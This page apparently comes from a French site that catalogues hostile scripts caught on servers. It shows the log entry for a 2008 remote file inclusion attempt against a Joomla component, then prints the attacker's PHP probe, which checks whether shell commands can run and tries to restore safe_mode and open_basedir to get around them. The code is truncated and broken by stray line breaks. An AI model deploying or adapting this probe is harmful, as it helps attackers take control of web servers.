Script potentiellement dangereux sur hisweb-nl
IP de provenance : 83.141.3.18
Date de connexion : 13-04-2008 20:46:14
Site : http://www.hisweb.nl/joomla//components/com_cbcontact/wget/test.txt?
Retour liste scripts
<?php
if( controlsafe()
)
{
echo("0xBBOFF");
}
else
{
echo("0xBBON");
}
function
controlsafe()
{
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net
start"))))
{
return(true);
}
else
{
ini_restore("safe_mode");
ini_rest
ore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net
start"))))
{
return(true);
}
else
{
return(false);
}
}
}
fun
ction ex($cfe){
$res = '';
$descriptorspec = array(0 => array("pipe", "r"),1
=> array("pipe", "w"),2 => array("file", "/tmp/ou", "a"));
if
(!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res =
join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res =
@shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@
system($cfe);
$res =
@ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')
[...]
Retour liste scripts
Crédits vignettes :
Thumbzor